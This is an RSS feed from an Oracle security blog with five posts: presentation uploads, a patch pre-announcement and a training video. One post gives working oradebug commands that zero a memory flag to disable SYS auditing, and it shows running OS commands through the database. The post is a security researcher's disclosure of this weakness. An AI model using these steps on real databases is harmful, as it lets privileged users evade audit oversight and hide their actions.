<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.2.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>Alexander Kornbrust Oracle Security Blog</title>
	<link>http://blog.red-database-security.com</link>
	<description>Oracle Security</description>
	<pubDate>Fri, 09 Mar 2012 09:01:44 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.1</generator>
	<language>en</language>
			<item>
		<title>2 Cebit 2012 Presentations about Database Security</title>
		<link>http://blog.red-database-security.com/2012/03/09/2-cebit-2012-presentations-about-database-security/</link>
		<comments>http://blog.red-database-security.com/2012/03/09/2-cebit-2012-presentations-about-database-security/#comments</comments>
		<pubDate>Fri, 09 Mar 2012 09:01:13 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2012/03/09/2-cebit-2012-presentations-about-database-security/</guid>
		<description><![CDATA[I just uploaded 2 presentations I gave at the Cebit 2012.

&#8220;Live-Hacking of Oracle Databases&#8221; (english)
&#8220;Überprüfung von Oracle-Datenbanken nach dem BSI Grundschutz-Standard&#8221; (german)

]]></description>
			<content:encoded><![CDATA[<p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; background-color: #ffffff; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; font: normal normal normal 1em/1.3em Georgia, 'Times New Roman', Times, serif; line-height: normal; padding: 0.5em">I just uploaded 2 presentations I gave at the Cebit 2012.</p>
<ul>
<li>&#8220;<a href="http://www.red-database-security.com/wp/Cebit%20-%20Live-Hacking%20von%20Oracle-Datenbanken.pdf" title="Cebit - Live-Hacking von Oracle-Datenbanken">Live-Hacking of Oracle Databases</a>&#8221; (english)</li>
<li>&#8220;<a href="http://www.red-database-security.com/wp/Cebit-Ueberpruefung_von_Oracle_Datenbanken_nach_dem_BSI_Grundschutz.pdf" title="Cebit - Überprüfung von Oracle-Datenbanken nach dem BSI Grundschutz-Standard.pdf">Überprüfung von Oracle-Datenbanken nach dem BSI Grundschutz-Standard</a>&#8221; (german)</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2012/03/09/2-cebit-2012-presentations-about-database-security/feed/</wfw:commentRss>
		</item>
		<item>
		<title>DOAG 2011 Presentation &#8220;Best of Oracle Security 2011&#8243;</title>
		<link>http://blog.red-database-security.com/2011/11/18/doag-2011-presentation-best-of-oracle-security-2011/</link>
		<comments>http://blog.red-database-security.com/2011/11/18/doag-2011-presentation-best-of-oracle-security-2011/#comments</comments>
		<pubDate>Fri, 18 Nov 2011 16:11:49 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2011/11/18/doag-2011-presentation-best-of-oracle-security-2011/</guid>
		<description><![CDATA[I just uploaded my DOAG 2011 presentation &#8221;Best of Oracle Security 2011&#8220;.
]]></description>
			<content:encoded><![CDATA[<p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; background-color: #ffffff; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; font: normal normal normal 1em/1.3em Georgia, 'Times New Roman', Times, serif; line-height: normal; padding: 0.5em">I just uploaded my DOAG 2011 presentation &#8221;<a href="http://www.red-database-security.com/wp/best_of_oracle_security_2011.pdf" title="Best of Oracle Security 2011">Best of Oracle Security 2011</a>&#8220;.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2011/11/18/doag-2011-presentation-best-of-oracle-security-2011/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Oracle Critical Patch Update Pre-Release Announcement - October 2011</title>
		<link>http://blog.red-database-security.com/2011/10/15/oracle-critical-patch-update-pre-release-announcement-october-2011/</link>
		<comments>http://blog.red-database-security.com/2011/10/15/oracle-critical-patch-update-pre-release-announcement-october-2011/#comments</comments>
		<pubDate>Sat, 15 Oct 2011 08:20:10 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2011/10/15/oracle-critical-patch-update-pre-release-announcement-october-2011/</guid>
		<description><![CDATA[Oracle released the Pre-Release Announcement for the Oracle CPU October 2011. The upcoming CPU will fix 4 issues in the Oracle database:


Application Express
Core RDBMS
Database Vault
Oracle Text

 The highest CVSS value is 6.5 (normally a SQL Injection vulnerability). None of the issues is remote exploitable.
]]></description>
			<content:encoded><![CDATA[<p>Oracle released the Pre-Release Announcement for the Oracle <a href="http://www.oracle.com/technetwork/topics/security/cpuoct2011-330135.html" title="Oracle Critical Patch Update Pre-Release Announcement - October 2011">CPU October 2011</a>. The upcoming CPU will fix 4 issues in the Oracle database:</p>
<p><span style="font-size: 11px; font-family: arial, helvetica, sans-serif; line-height: normal" class="Apple-style-span"></p>
<ul style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; list-style-type: none; list-style-position: initial; list-style-image: initial; font-family: arial, helvetica, sans-serif; font-size: 12px; color: #000000; padding: 0px">
<li style="margin-top: 0.2em; margin-right: 0px; margin-bottom: 0.2em; margin-left: 25px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 10px; list-style-type: none; list-style-position: initial; list-style-image: initial; font-family: arial, helvetica, sans-serif; font-size: 12px; color: #000000; background-image: url('http://www.oracleimg.com/us/assets/bullet1.gif'); background-attachment: initial; background-origin: initial; background-clip: initial; background-color: initial; background-position: 0px 5px; background-repeat: no-repeat no-repeat">Application Express</li>
<li style="margin-top: 0.2em; margin-right: 0px; margin-bottom: 0.2em; margin-left: 25px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 10px; list-style-type: none; list-style-position: initial; list-style-image: initial; font-family: arial, helvetica, sans-serif; font-size: 12px; color: #000000; background-image: url('http://www.oracleimg.com/us/assets/bullet1.gif'); background-attachment: initial; background-origin: initial; background-clip: initial; background-color: initial; background-position: 0px 5px; background-repeat: no-repeat no-repeat">Core RDBMS</li>
<li style="margin-top: 0.2em; margin-right: 0px; margin-bottom: 0.2em; margin-left: 25px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 10px; list-style-type: none; list-style-position: initial; list-style-image: initial; font-family: arial, helvetica, sans-serif; font-size: 12px; color: #000000; background-image: url('http://www.oracleimg.com/us/assets/bullet1.gif'); background-attachment: initial; background-origin: initial; background-clip: initial; background-color: initial; background-position: 0px 5px; background-repeat: no-repeat no-repeat">Database Vault</li>
<li style="margin-top: 0.2em; margin-right: 0px; margin-bottom: 0.2em; margin-left: 25px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 10px; list-style-type: none; list-style-position: initial; list-style-image: initial; font-family: arial, helvetica, sans-serif; font-size: 12px; color: #000000; background-image: url('http://www.oracleimg.com/us/assets/bullet1.gif'); background-attachment: initial; background-origin: initial; background-clip: initial; background-color: initial; background-position: 0px 5px; background-repeat: no-repeat no-repeat">Oracle Text</li>
</ul>
<p></span> The highest CVSS value is 6.5 (normally a SQL Injection vulnerability). None of the issues is remote exploitable.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2011/10/15/oracle-critical-patch-update-pre-release-announcement-october-2011/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Disable Auditing and running OS commands using oradebug</title>
		<link>http://blog.red-database-security.com/2011/09/17/disable-auditing-and-running-os-commands-using-oradebug/</link>
		<comments>http://blog.red-database-security.com/2011/09/17/disable-auditing-and-running-os-commands-using-oradebug/#comments</comments>
		<pubDate>Sat, 17 Sep 2011 17:29:29 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Forensics]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2011/09/17/disable-auditing-and-running-os-commands-using-oradebug/</guid>
		<description><![CDATA[Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth.  He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or [...]]]></description>
			<content:encoded><![CDATA[<p>Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (<a href="http://www.red-database-security.com/wp/oracle_forensics_101.pdf" title="Oracle Forensics">pdf of the presentation</a>).The second talk was given by Laszlo Toth.  He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage <a href="http://soonerorlater.hu/index.khtml" title="Soonerorlater">soonerorlater.hu</a>.</p>
<p>oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:</p>
<p>Sample - disable Oracle SYS Auditing:</p>
<p><span style="font-family: 'Courier New', Courier, monospace; font-size: small; line-height: normal" class="Apple-style-span"><br />
</span></p>
<p><span style="font-family: 'Courier New', Courier, monospace; font-size: small; line-height: normal" class="Apple-style-span">sqlplus / as sysdba</span></p>
<p><span style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small; line-height: normal" class="Apple-style-span"></p>
<p style="font-family: 'Courier New', Courier, monospace">SQL&gt; &#8212; get the offset for oradebug</p>
<p style="font-family: 'Courier New', Courier, monospace">SQL&gt; select fsv.KSMFSNAM,sga.*<br />
from x$ksmfsv fsv, x$ksmmem sga<br />
where sga.addr=fsv.KSMFSADR<br />
and fsv.ksmfsnam like &#8216;kzaflg_%&#8217;;</p>
<p style="font-family: 'Courier New', Courier, monospace">KSMFSNAM ADDR INDX INST_ID KSMMMVAL<br />
&#8212;&#8212;&#8212;&#8212;&#8212;- &#8212;&#8212;&#8212;- &#8212;&#8212;&#8212;- &#8212;&#8212;&#8212;&#8212;&#8212;-<br />
kzaflg_ 0000000060031BB0 26652 1 0000000000000001
</p>
<p style="font-family: 'Courier New', Courier, monospace">SQL&gt; show parameter audit;</p>
<p style="font-family: 'Courier New', Courier, monospace">NAME TYPE VALUE<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
audit_file_dest string /u01/app/oracle/admin/PSALES/adump<br />
audit_sys_operations boolean TRUE<br />
audit_syslog_level string<br />
audit_trail string DB, EXTENDED</p>
<p style="font-family: 'Courier New', Courier, monospace">SQL&gt; oradebug poke 0&#215;60031bb0 1 0<br />
BEFORE: [060031BB0, 060031BB4) = 00000001<br />
AFTER: [060031BB0, 060031BB4) = 00000000</p>
<p></span></p>
<p>oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .</p>
<p>Another trick from Laszlo&#8217;s presentation was how to use oradebug to call OS commands via the database</p>
<p><span style="font-family: 'Courier New', Courier, monospace; font-size: small; line-height: normal" class="Apple-style-span">SQL&gt; oradebug call system</span><span style="white-space: pre" class="Apple-tab-span">	</span>&#8220;ls -la &gt;/tmp/hacktivity.txt&#8221;</p>
<p>Later I will talk about Laszlo&#8217;s trick how to disable the Oracle authentication using oradebug.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2011/09/17/disable-auditing-and-running-os-commands-using-oradebug/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Blackhat Training &#8220;HACKING AND SECURING ORACLE (2 days) &#8220;</title>
		<link>http://blog.red-database-security.com/2011/04/13/blackhat-training-hacking-and-securing-oracle-2-days/</link>
		<comments>http://blog.red-database-security.com/2011/04/13/blackhat-training-hacking-and-securing-oracle-2-days/#comments</comments>
		<pubDate>Wed, 13 Apr 2011 09:05:18 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Trainings]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Forensics]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2011/04/13/blackhat-training-hacking-and-securing-oracle-2-days/</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p><iframe src="http://www.youtube.com/embed/ovtMgkh2tAI" title="YouTube video player" frameborder="0" height="390" width="480"></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2011/04/13/blackhat-training-hacking-and-securing-oracle-2-days/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>

